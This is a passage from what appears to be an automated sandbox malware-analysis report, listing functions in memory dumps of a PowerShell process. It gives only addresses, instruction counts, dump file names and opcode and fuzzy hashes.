                                                                                                                    • Instruction ID: 20a67135fb8859e9b95d9f4227880c7305615f3909fe5a5d649776c92ec3b81b
                                                                                                                    • Opcode Fuzzy Hash: 89448e1a6737072ee0cb89a909457d5f6d2b94cc65aac524f25542874bdb54a0
                                                                                                                    • Instruction Fuzzy Hash: 0C1182F1A0020ADFCB20DF59C645B6AF7E5EB85251F448366D51887211E332D946CBA1
                                                                                                                    Function 035AF3D3 Relevance: .1, Instructions: 57COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000002.00000002.1314636404.00000000035AD000.00000040.00000800.00020000.00000000.sdmp, Offset: 035AD000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_2_2_35ad000_powershell.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID:
                                                                                                                    • API String ID:
                                                                                                                    • Opcode ID: 97445b17e520f814378829faa67ba79061bab103a32ab6c15715ac3201c2f727
                                                                                                                    • Instruction ID: b0dcf2abf97e9fea3229861233952005d632ed9042cf0ab47dccf48ca4ac85ae
                                                                                                                    • Opcode Fuzzy Hash: 97445b17e520f814378829faa67ba79061bab103a32ab6c15715ac3201c2f727
                                                                                                                    • Instruction Fuzzy Hash: F121AC76508640DFCB06CF14E9C0B16BF72FB88314F28C5A9D8494A666C33AD46ADB91
                                                                                                                    Function 0361C41F Relevance: .1, Instructions: 55COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000002.00000002.1314841471.0000000003610000.00000040.00000800.00020000.00000000.sdmp, Offset: 03610000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_2_2_3610000_powershell.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID:
                                                                                                                    • API String ID:
                                                                                                                    • Opcode ID: a6fb4c454af1ea305a1a8ad040bfb029b076296d09b9c0d70024e3cbed3c4bba
                                                                                                                    • Instruction ID: 9c44ebbfd7065a5d113761f565df713524ff37ba0e4db8364b10442ed50af517
                                                                                                                    • Opcode Fuzzy Hash: a6fb4c454af1ea305a1a8ad040bfb029b076296d09b9c0d70024e3cbed3c4bba
                                                                                                                    • Instruction Fuzzy Hash: 22115E7120E3C14FD317966498646A57FB19F87254F1D40EFC8C5CB1A3D96A8849C362
                                                                                                                    Function 0361DFF8 Relevance: .1, Instructions: 55COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000002.00000002.1314841471.0000000003610000.00000040.00000800.00020000.00000000.sdmp, Offset: 03610000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_2_2_3610000_powershell.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID:
                                                                                                                    • API String ID:
                                                                                                                    • Opcode ID: a256384c425a225e0de6dd2d4ed27a9775183c5e6b470bb3f1602fa950ee21d8
                                                                                                                    • Instruction ID: 27dea4748281743e39020c40257aab4f5a2a61cfafdf82733fa237e72f092e62
                                                                                                                    • Opcode Fuzzy Hash: a256384c425a225e0de6dd2d4ed27a9775183c5e6b470bb3f1602fa950ee21d8
                                                                                                                    • Instruction Fuzzy Hash: 9D114F35705240CFC711DB78E558AAABBF1FF89315F1544AEE459CB352C672A816CB10
                                                                                                                    Function 035AF027 Relevance: .1, Instructions: 53COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000002.00000002.1314636404.00000000035AD000.00000040.00000800.00020000.00000000.sdmp, Offset: 035AD000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_2_2_35ad000_powershell.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID:
                                                                                                                    • API String ID:
                                                                                                                    • Opcode ID: 7ff28159916af3c1565c82e67f2b531337ed64e047a92009350b64a0d4c4a9ec
                                                                                                                    • Instruction ID: f74c928c25a126dad85e1043fe29744736dc016312689bf48dbc3c9fc5a36bce
                                                                                                                    • Opcode Fuzzy Hash: 7ff28159916af3c1565c82e67f2b531337ed64e047a92009350b64a0d4c4a9ec
                                                                                                                    • Instruction Fuzzy Hash: 5511D079504680DFCB11CF14D9C0B19FFB1FB44318F28C6AAD84A4B666C33AD44ADB61
                                                                                                                    Function 0361BDC0 Relevance: .1, Instructions: 52COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000002.00000002.1314841471.0000000003610000.00000040.00000800.00020000.00000000.sdmp, Offset: 03610000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_2_2_3610000_powershell.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID:
                                                                                                                    • API String ID:
                                                                                                                    • Opcode ID: f96c6e42085345a2c84dd8795fd5bac015cabad08e5e02d3182a27e525b9fc2f
                                                                                                                    • Instruction ID: 986f1628b6fce93c93ffe66045bb5e6b4e8227ebcdfb51137d69f77c66ad3cee
                                                                                                                    • Opcode Fuzzy Hash: f96c6e42085345a2c84dd8795fd5bac015cabad08e5e02d3182a27e525b9fc2f
                                                                                                                    • Instruction Fuzzy Hash: 7D01ED316087849FC719DB29C594B9ABFE0AF45210F0848EEE08ACB7A2CA20E845CB01
                                                                                                                    Function 0361E1E0 Relevance: .0, Instructions: 48COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000002.00000002.1314841471.0000000003610000.00000040.00000800.00020000.00000000.sdmp, Offset: 03610000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_2_2_3610000_powershell.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID:
                                                                                                                    • API String ID:
                                                                                                                    • Opcode ID: 204f595280ffe1fe95c4b2fbbf1cad2bd510b539a56db2d4b44eccf7e362f455
                                                                                                                    • Instruction ID: 4e2c7deb278f3d163268f1352c6c5f32f1fd7efd9b0bbbc59c97d8e34fdf5257
                                                                                                                    • Opcode Fuzzy Hash: 204f595280ffe1fe95c4b2fbbf1cad2bd510b539a56db2d4b44eccf7e362f455
                                                                                                                    • Instruction Fuzzy Hash: 5E11F735204750CFC728DF79D45489ABBF6EF8921576489ADD44A87BA0CB32EC46CB50
                                                                                                                    Function 0361DF78 Relevance: .0, Instructions: 48COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000002.00000002.1314841471.0000000003610000.00000040.00000800.00020000.00000000.sdmp, Offset: 03610000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_2_2_3610000_powershell.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID:
                                                                                                                    • API String ID:
                                                                                                                    • Opcode ID: 71dcc0f9922c03571ee71f41bc6226cb43a891a005e3b8aa74f6f9463862dfc8
                                                                                                                    • Instruction ID: 947cec4bba40aa902518e38c659fb897fa55245bfd251653d6a5addc13fa41bb
                                                                                                                    • Opcode Fuzzy Hash: 71dcc0f9922c03571ee71f41bc6226cb43a891a005e3b8aa74f6f9463862dfc8
                                                                                                                    • Instruction Fuzzy Hash: F0016935B04215DFCB15AFB4E848AAEBBB6FB88315B14406DE51E93242DB329911CB90
                                                                                                                    Function 035AD01D Relevance: .0, Instructions: 45COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000002.00000002.1314636404.00000000035AD000.00000040.00000800.00020000.00000000.sdmp, Offset: 035AD000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_2_2_35ad000_powershell.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID:
                                                                                                                    • API String ID:
                                                                                                                    • Opcode ID: ed740966231c62ecdf13de2d0f5473e55c571439786e7ae3febb12c7b48d4ca5
                                                                                                                    • Instruction ID: 8ab6adec88adfc5a63800a915eb0ed7abbf508caa8fd25399d03e114acb163a0
                                                                                                                    • Opcode Fuzzy Hash: ed740966231c62ecdf13de2d0f5473e55c571439786e7ae3febb12c7b48d4ca5
                                                                                                                    • Instruction Fuzzy Hash: C9014C71404B409FE710DE19D8C476AFBE8FF42230F1CC415DD450B552D2758441E6B1
                                                                                                                    Function 035AD006 Relevance: .0, Instructions: 45COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000002.00000002.1314636404.00000000035AD000.00000040.00000800.00020000.00000000.sdmp, Offset: 035AD000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_2_2_35ad000_powershell.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID:
                                                                                                                    • API String ID:
                                                                                                                    • Opcode ID: a54a3813ad861ca6d0be4019af6a0a753c84d48c2711edb4618a307be2630c75
                                                                                                                    • Instruction ID: ea4645cc17d0811168500db1085ad229e8a00bf38653745777d87deff94ec8a6
                                                                                                                    • Opcode Fuzzy Hash: a54a3813ad861ca6d0be4019af6a0a753c84d48c2711edb4618a307be2630c75
                                                                                                                    • Instruction Fuzzy Hash: B801807200E7C05FD7128B25C994B56BFB4EF43224F1D80DBD9888F6A7C2685845DB72
                                                                                                                    Function 0361BFF0 Relevance: .0, Instructions: 44COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000002.00000002.1314841471.0000000003610000.00000040.00000800.00020000.00000000.sdmp, Offset: 03610000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_2_2_3610000_powershell.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID:
                                                                                                                    • API String ID:
                                                                                                                    • Opcode ID: daaec4ecd7dc8d9a61a98e90121a845eb4619c632cb62509cc8afda515275f88
                                                                                                                    • Instruction ID: b17edf64b4cd3f4bcaf18c70daffcd4f335c1c9cc613e27edbe08f21f3f0db8d
                                                                                                                    • Opcode Fuzzy Hash: daaec4ecd7dc8d9a61a98e90121a845eb4619c632cb62509cc8afda515275f88
                                                                                                                    • Instruction Fuzzy Hash: 62F0A47230A3A05FD7118A799C54D6B7FE9AF8652070945AAF444C73A2DAB5CC048760
                                                                                                                    Function 0361C5A0 Relevance: .0, Instructions: 40COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000002.00000002.1314841471.0000000003610000.00000040.00000800.00020000.00000000.sdmp, Offset: 03610000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_2_2_3610000_powershell.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID:
                                                                                                                    • API String ID:
                                                                                                                    • Opcode ID: 3569e048eba3ba50b8cce47691c2617d4eed465532fc879926fe832d8e9a41be
                                                                                                                    • Instruction ID: edda21098eb2833bc168b92dd7e7921e97e192c28d3369be4befca488abf97bb
                                                                                                                    • Opcode Fuzzy Hash: 3569e048eba3ba50b8cce47691c2617d4eed465532fc879926fe832d8e9a41be
                                                                                                                    • Instruction Fuzzy Hash: 42F0C2352043419FC301EB2CE85096ABBA2FFC221570489BED0898F661CE72AC05D7A1
                                                                                                                    Function 0361CC32 Relevance: .0, Instructions: 39COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000002.00000002.1314841471.0000000003610000.00000040.00000800.00020000.00000000.sdmp, Offset: 03610000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_2_2_3610000_powershell.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID:
                                                                                                                    • API String ID:
                                                                                                                    • Opcode ID: b01baf86f4145c9de9ed2710d8af49ab622f47f800fee434cbcce635ff72f84a
                                                                                                                    • Instruction ID: 2a46244523173ef31c377c579639fb4a50968f092199b38400babca22bca9146
                                                                                                                    • Opcode Fuzzy Hash: b01baf86f4145c9de9ed2710d8af49ab622f47f800fee434cbcce635ff72f84a
                                                                                                                    • Instruction Fuzzy Hash: A5F0E2343493405FC356A22D6CA096E6FF6EEC216035989AAD48BCB962CD695C0A8771
                                                                                                                    Function 0361C000 Relevance: .0, Instructions: 38COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000002.00000002.1314841471.0000000003610000.00000040.00000800.00020000.00000000.sdmp, Offset: 03610000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_2_2_3610000_powershell.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID:
                                                                                                                    • API String ID:
                                                                                                                    • Opcode ID: 985c8695a680266cc8b8590bca74781873fd156f8c137bfdfffa345bde07b7de
                                                                                                                    • Instruction ID: b531a5ec068ab21642b9831cbabd4a995224ad11edaf9dd702de542899ca10c6
                                                                                                                    • Opcode Fuzzy Hash: 985c8695a680266cc8b8590bca74781873fd156f8c137bfdfffa345bde07b7de
                                                                                                                    • Instruction Fuzzy Hash: 41F0BE323182645FD7008A6A9C84EBBBFEDEBC9621B08407AF948C3351DAB1CC0086A0
                                                                                                                    Function 035AD9A7 Relevance: .0, Instructions: 37COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000002.00000002.1314636404.00000000035AD000.00000040.00000800.00020000.00000000.sdmp, Offset: 035AD000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_2_2_35ad000_powershell.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID:
                                                                                                                    • API String ID:
                                                                                                                    • Opcode ID: 54aa347ca432979b653b4a0b8e0f6a2cd3ce78ba417d0100136e5fee92a20787
                                                                                                                    • Instruction ID: cbb69867ef01d71ca2d5f086ff35ce3c82038902f432a7eed19781541658a3c4
                                                                                                                    • Opcode Fuzzy Hash: 54aa347ca432979b653b4a0b8e0f6a2cd3ce78ba417d0100136e5fee92a20787
                                                                                                                    • Instruction Fuzzy Hash: CBF037B6200600AFC320DF0AD984C26FBB9EBC5630319C45AE84A4BA12C631EC41CAA0
                                                                                                                    Function 036191B8 Relevance: .0, Instructions: 35COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000002.00000002.1314841471.0000000003610000.00000040.00000800.00020000.00000000.sdmp, Offset: 03610000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_2_2_3610000_powershell.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID:
                                                                                                                    • API String ID:
                                                                                                                    • Opcode ID: cbecd3ac208e29afb95ba80a029c5a2d1132ef20c80e4eeabe1363a17688e3a6
                                                                                                                    • Instruction ID: 52e6fe3b06c2c6108fb4448886b18b25dce0d3a9d085da13b9f7179ff06b9487
                                                                                                                    • Opcode Fuzzy Hash: cbecd3ac208e29afb95ba80a029c5a2d1132ef20c80e4eeabe1363a17688e3a6
                                                                                                                    • Instruction Fuzzy Hash: EEF0C27A7042504FD355EB28D0593AB7BB2EFC1319F1481AED8168B291CE396806CBA1
                                                                                                                    Function 03617A2C Relevance: .0, Instructions: 35COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000002.00000002.1314841471.0000000003610000.00000040.00000800.00020000.00000000.sdmp, Offset: 03610000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_2_2_3610000_powershell.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID:
                                                                                                                    • API String ID:
                                                                                                                    • Opcode ID: cfa996752c516fbe4149ac6e2cdf51ea504af496555e62f140a054963578658b
                                                                                                                    • Instruction ID: 88ccf870ec4fa520dcf6b48080aeffc0aeb9e69d8f5820945482795a73b3a551
                                                                                                                    • Opcode Fuzzy Hash: cfa996752c516fbe4149ac6e2cdf51ea504af496555e62f140a054963578658b
                                                                                                                    • Instruction Fuzzy Hash: 6DF0E2353006149FCB10DBA9E880ABF7BE5EBC86A1B04062DE00ED7310CBB15C458760
                                                                                                                    Function 0361DF18 Relevance: .0, Instructions: 34COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000002.00000002.1314841471.0000000003610000.00000040.00000800.00020000.00000000.sdmp, Offset: 03610000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_2_2_3610000_powershell.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID:
                                                                                                                    • API String ID:
                                                                                                                    • Opcode ID: 452478379183a405cf02f8ae51d4ca82ccc5ef0a22ac4538c87d5d0e2d8b09ac
                                                                                                                    • Instruction ID: aac314778ec08b8a4f216790967f6ea03d7b432efdc73b0ac120916fdfc113d4
                                                                                                                    • Opcode Fuzzy Hash: 452478379183a405cf02f8ae51d4ca82ccc5ef0a22ac4538c87d5d0e2d8b09ac
                                                                                                                    • Instruction Fuzzy Hash: 84F05E343052808FC7119B2DD494876BBF69FCA61932E00DDE4C9CB732CAA1CC11CB50
                                                                                                                    Function 03617A30 Relevance: .0, Instructions: 33COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000002.00000002.1314841471.0000000003610000.00000040.00000800.00020000.00000000.sdmp, Offset: 03610000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_2_2_3610000_powershell.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID:
                                                                                                                    • API String ID:
                                                                                                                    • Opcode ID: 791ab1adcb01993c1079c9093c45a046e8c60bb56a68bbc650d3664b679f78fe
                                                                                                                    • Instruction ID: 1c40d3e786ee27f3c67011c9a6dc94c8937706bdf577b646ad0d7ecd6e0b66ef
                                                                                                                    • Opcode Fuzzy Hash: 791ab1adcb01993c1079c9093c45a046e8c60bb56a68bbc650d3664b679f78fe
                                                                                                                    • Instruction Fuzzy Hash: B9F0A7353007149FC710DB59D844A6F77E9FBC96A1B00062DE50ED7310DF71AD4587A4
                                                                                                                    Function 035AD998 Relevance: .0, Instructions: 33COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000002.00000002.1314636404.00000000035AD000.00000040.00000800.00020000.00000000.sdmp, Offset: 035AD000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_2_2_35ad000_powershell.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID:
                                                                                                                    • API String ID:
                                                                                                                    • Opcode ID: 075fb406fd28cb016dc1a42421cd25c8c9c73918b47ee334c2575d6cd3a07eb9
                                                                                                                    • Instruction ID: 382c47072ae78bf2f56f5e5a4aca713ec2cac06dc379a47e0957c3890ca07a30
                                                                                                                    • Opcode Fuzzy Hash: 075fb406fd28cb016dc1a42421cd25c8c9c73918b47ee334c2575d6cd3a07eb9
                                                                                                                    • Instruction Fuzzy Hash: 58F0FF75104A40AFD755DF06CD85D23BBB9EBC5634B198489A8594B752C631FC41CF60
                                                                                                                    Function 0361C5B0 Relevance: .0, Instructions: 32COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000002.00000002.1314841471.0000000003610000.00000040.00000800.00020000.00000000.sdmp, Offset: 03610000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_2_2_3610000_powershell.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID:
                                                                                                                    • API String ID:
                                                                                                                    • Opcode ID: 8e22447b73902dccbee16d432a4029b4bf55ce7b74352c9cfed4da4c4e62917a
                                                                                                                    • Instruction ID: d40f72fb5488052359aeec4b0ef6660ce7b463d47dee531ff9f9e6e9c3a1f6ec
                                                                                                                    • Opcode Fuzzy Hash: 8e22447b73902dccbee16d432a4029b4bf55ce7b74352c9cfed4da4c4e62917a
                                                                                                                    • Instruction Fuzzy Hash: 43F082352007055BC314EB29E84095FB7E6FFC26157448A3DD1498F720DF71AC059BA0
                                                                                                                    Function 03619238 Relevance: .0, Instructions: 31COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000002.00000002.1314841471.0000000003610000.00000040.00000800.00020000.00000000.sdmp, Offset: 03610000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_2_2_3610000_powershell.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID:
                                                                                                                    • API String ID:
                                                                                                                    • Opcode ID: 11de350fd3ca61f26785389e11f4573fb4e6999cc158bea8d1ed53c50f1942f1
                                                                                                                    • Instruction ID: 9d4fdb63af4da867b3a95475da31cc96c8ce65e319fa710cd28c5da6c6bf4a70
                                                                                                                    • Opcode Fuzzy Hash: 11de350fd3ca61f26785389e11f4573fb4e6999cc158bea8d1ed53c50f1942f1
                                                                                                                    • Instruction Fuzzy Hash: 7CF0BE7060A3408FD761DBB8D4AC39ABFA1EB42310F0408AEE44ECB282CB396885C750
                                                                                                                    Function 036191C8 Relevance: .0, Instructions: 31COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000002.00000002.1314841471.0000000003610000.00000040.00000800.00020000.00000000.sdmp, Offset: 03610000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_2_2_3610000_powershell.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID:
                                                                                                                    • API String ID:
                                                                                                                    • Opcode ID: 837bbb8a9bddc46c5d25e3c16785348c3b3ef6f3cce1ce2e55d033dc1a778feb
                                                                                                                    • Instruction ID: 18f6c097ef2f8724617b20c196404e8cd11f9c20890cf8c86c9c9315d534ad34
                                                                                                                    • Opcode Fuzzy Hash: 837bbb8a9bddc46c5d25e3c16785348c3b3ef6f3cce1ce2e55d033dc1a778feb
                                                                                                                    • Instruction Fuzzy Hash: ADF0E2796046144BD304BB68D0583AFBBA6EBC0719F10812AC90A4B384CE39680287E0
                                                                                                                    Function 0361775F Relevance: .0, Instructions: 31COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000002.00000002.1314841471.0000000003610000.00000040.00000800.00020000.00000000.sdmp, Offset: 03610000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_2_2_3610000_powershell.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID:
                                                                                                                    • API String ID:
                                                                                                                    • Opcode ID: 51c0b5aabacade3e3f8f8534120455697c3b9bdda41f363032bd47c0c64428b0
                                                                                                                    • Instruction ID: 7d6f44c55e9566303441bb2351a22858f2275608ff65ed21fe7c39d3b87563b6
                                                                                                                    • Opcode Fuzzy Hash: 51c0b5aabacade3e3f8f8534120455697c3b9bdda41f363032bd47c0c64428b0
                                                                                                                    • Instruction Fuzzy Hash: A4F0E53A300615CFDB00DB68D944BA9B7EAEFC8651B094194E40ACB324DF70CC128B90
                                                                                                                    Function 0361DD68 Relevance: .0, Instructions: 31COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000002.00000002.1314841471.0000000003610000.00000040.00000800.00020000.00000000.sdmp, Offset: 03610000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_2_2_3610000_powershell.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID:
                                                                                                                    • API String ID:
                                                                                                                    • Opcode ID: 15db6053443051009c119eac5d834193f59fb1ddda752c45cf7ac72fa81da4d4
                                                                                                                    • Instruction ID: d2975b132ee21c4b50fb2d100e529beb5fd3cff9e03dfe25085bd7f6a733da10
                                                                                                                    • Opcode Fuzzy Hash: 15db6053443051009c119eac5d834193f59fb1ddda752c45cf7ac72fa81da4d4
                                                                                                                    • Instruction Fuzzy Hash: 5FF0EC35609B906BC317D32D541085F7FE69DC3560719449ED055CB252CEA5CC06C7A2
                                                                                                                    Function 0361DF28 Relevance: .0, Instructions: 30COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000002.00000002.1314841471.0000000003610000.00000040.00000800.00020000.00000000.sdmp, Offset: 03610000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_2_2_3610000_powershell.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID:
                                                                                                                    • API String ID:
                                                                                                                    • Opcode ID: 9e9fedb9105f0401d63d5bd122cb0ea9c1661ecd6d5c6dafeb141c73bd0dde69
                                                                                                                    • Instruction ID: 4b0305101ca17a3e3487d88116bdd90c535ab46c0f3955848bc005b05e629dd6
                                                                                                                    • Opcode Fuzzy Hash: 9e9fedb9105f0401d63d5bd122cb0ea9c1661ecd6d5c6dafeb141c73bd0dde69
                                                                                                                    • Instruction Fuzzy Hash: 6AE0E5353002148F8610DB1ED498D2AB7FAEFCEA2572A40A9F589CB725DA71EC01CB90
                                                                                                                    Function 03619622 Relevance: .0, Instructions: 29COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000002.00000002.1314841471.0000000003610000.00000040.00000800.00020000.00000000.sdmp, Offset: 03610000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_2_2_3610000_powershell.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID:
                                                                                                                    • API String ID:
                                                                                                                    • Opcode ID: 341caf1aa9a2dbe468a924ceaca76ec5d44b74127b495c2ffc7235d2292cdb1b
                                                                                                                    • Instruction ID: a722e4704c8fb309b94ad3d14600be8804d3be3380df7e16716cebc73def6641
                                                                                                                    • Opcode Fuzzy Hash: 341caf1aa9a2dbe468a924ceaca76ec5d44b74127b495c2ffc7235d2292cdb1b
                                                                                                                    • Instruction Fuzzy Hash: E5E0DF2270A3D54B8722E2B965205BA6FEA4EC6264F1D01FFC949DF243CC808C25C3F2
                                                                                                                    Function 03618A4A Relevance: .0, Instructions: 29COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000002.00000002.1314841471.0000000003610000.00000040.00000800.00020000.00000000.sdmp, Offset: 03610000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_2_2_3610000_powershell.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID:
                                                                                                                    • API String ID:
                                                                                                                    • Opcode ID: 5e4aa9fdc4b945fe61c745a4c2dc31822d4d9b48a33c99ac265b30dd5345ee72
                                                                                                                    • Instruction ID: bee56012b08eec3b4d7a2bd87bed5d0b0d0c15fe149c981c7a64f30eb4a38fb0
                                                                                                                    • Opcode Fuzzy Hash: 5e4aa9fdc4b945fe61c745a4c2dc31822d4d9b48a33c99ac265b30dd5345ee72
                                                                                                                    • Instruction Fuzzy Hash: C4F0A73930D7918FCB06A77894581AD6FB29BC1214F05006ED549CB243CE7548098395
                                                                                                                    Function 0361DDB9 Relevance: .0, Instructions: 29COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000002.00000002.1314841471.0000000003610000.00000040.00000800.00020000.00000000.sdmp, Offset: 03610000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_2_2_3610000_powershell.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID:
                                                                                                                    • API String ID:
                                                                                                                    • Opcode ID: 31abf33f31d93159f8032af9344f37f5b1884f27596ad5ec4cc30553545d616b
                                                                                                                    • Instruction ID: cfaab8ebf064f3ec05780fdd1a8a8947e8c5bdb570ef541d5fe9215b9318b3da
                                                                                                                    • Opcode Fuzzy Hash: 31abf33f31d93159f8032af9344f37f5b1884f27596ad5ec4cc30553545d616b
                                                                                                                    • Instruction Fuzzy Hash: 1DE09B71704550578B05C65CD8544F9FF75DFC9221F04847EE946A7240CE729517D7E1
                                                                                                                    Function 0361CC48 Relevance: .0, Instructions: 27COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000002.00000002.1314841471.0000000003610000.00000040.00000800.00020000.00000000.sdmp, Offset: 03610000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_2_2_3610000_powershell.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID:
                                                                                                                    • API String ID:
